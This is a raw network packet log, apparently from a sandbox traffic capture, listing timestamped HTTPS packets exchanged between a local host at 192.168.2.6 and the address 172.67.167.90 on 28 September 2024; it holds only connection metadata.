Sep 28, 2024 05:23:48.041002989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.041021109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.041048050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.042654037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.042670012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.042740107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.042749882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.042802095 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.043011904 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043026924 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043065071 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.043072939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043090105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.043114901 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.043423891 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043438911 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043488026 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.043495893 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.043539047 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.125756979 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.125777960 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.125834942 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.125854969 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.125873089 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.125906944 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.125996113 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126015902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126053095 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126060963 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126118898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126327038 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126343012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126378059 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126384974 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126403093 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126411915 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126650095 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126672029 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126704931 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126712084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126735926 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126751900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126882076 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126921892 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126926899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.126933098 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.126974106 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129240990 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129257917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129323006 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129331112 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129370928 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129585981 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129605055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129631042 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129638910 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129659891 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129674911 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129865885 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129880905 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129911900 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129920959 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.129945040 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.129960060 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213021994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213047981 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213131905 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213179111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213227034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213285923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213300943 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213326931 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213337898 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213361025 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213376045 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213612080 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213634968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213658094 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213666916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213710070 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213867903 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213886023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213896036 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213907003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.213922977 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213934898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.213958979 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.214116096 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.214128971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.214157104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.214165926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.214183092 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.214202881 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216263056 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216290951 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216314077 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216342926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216362953 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216382980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216514111 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216528893 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216559887 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216568947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216588020 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216605902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216754913 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216769934 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216798067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216808081 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.216826916 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.216842890 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.299881935 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.299909115 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.299990892 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300048113 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300086021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300095081 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300163984 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300180912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300219059 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300228119 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300261021 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300426006 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300441027 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300477028 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300484896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300512075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300524950 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300671101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300688028 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300717115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300724030 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300755024 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300765038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.300975084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.300990105 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.301021099 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.301028967 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.301052094 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.301071882 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303416014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303433895 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303514004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303522110 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303564072 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303572893 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303587914 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303612947 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303621054 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303646088 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303661108 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303905964 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303929090 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303957939 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.303966045 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.303987980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.304008007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387676954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387701988 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387753010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387789011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387809038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387830019 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387859106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387881041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387919903 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387928963 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.387948990 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.387964964 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388149977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388168097 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388196945 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388202906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388226032 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388242960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388501883 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388518095 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388566017 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388577938 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388614893 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388685942 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388700008 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388726950 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388734102 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.388756990 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.388773918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403336048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403362989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403430939 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403471947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403518915 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403609037 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403625965 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403659105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403666973 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403691053 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403706074 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403726101 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403743982 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403768063 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403774023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.403801918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.403819084 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474550962 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474576950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474642038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474689007 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474708080 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474725962 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474801064 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474818945 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474847078 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474858046 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.474884033 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.474903107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475014925 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475038052 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475064039 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475073099 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475090981 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475109100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475419044 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475440025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475467920 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475476980 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475500107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475521088 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475579977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475600958 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475639105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475649118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.475667953 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.475682020 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490123987 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490148067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490197897 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490227938 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490243912 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490267038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490302086 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490324020 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490350008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490358114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490379095 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490397930 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490534067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490556955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490597010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490603924 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.490616083 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.490636110 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561676025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561733961 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561768055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561798096 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561815023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561816931 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561836958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561842918 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561866045 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561871052 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561892986 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561898947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.561923981 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.561944008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562110901 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562144041 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562163115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562171936 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562190056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562216043 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562360048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562377930 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562411070 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562418938 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562441111 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562463999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562777042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562793970 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562843084 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.562854052 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.562895060 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577066898 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577102900 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577153921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577184916 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577207088 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577224016 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577363968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577380896 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577406883 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577414036 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577435970 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577452898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577467918 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577487946 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577542067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.577549934 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.577586889 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648503065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648521900 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648597002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648628950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648674965 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648718119 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648735046 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648768902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648777008 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648798943 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648822069 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648927927 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648945093 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.648972034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.648977995 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649007082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649027109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649188042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649202108 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649234056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649240971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649264097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649275064 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649524927 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649538994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649584055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.649591923 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.649631023 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.664115906 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664145947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664222956 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.664232016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:48.664257050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:48.664264917 CEST	49739	443	192.168.2.6	172.67.167.90
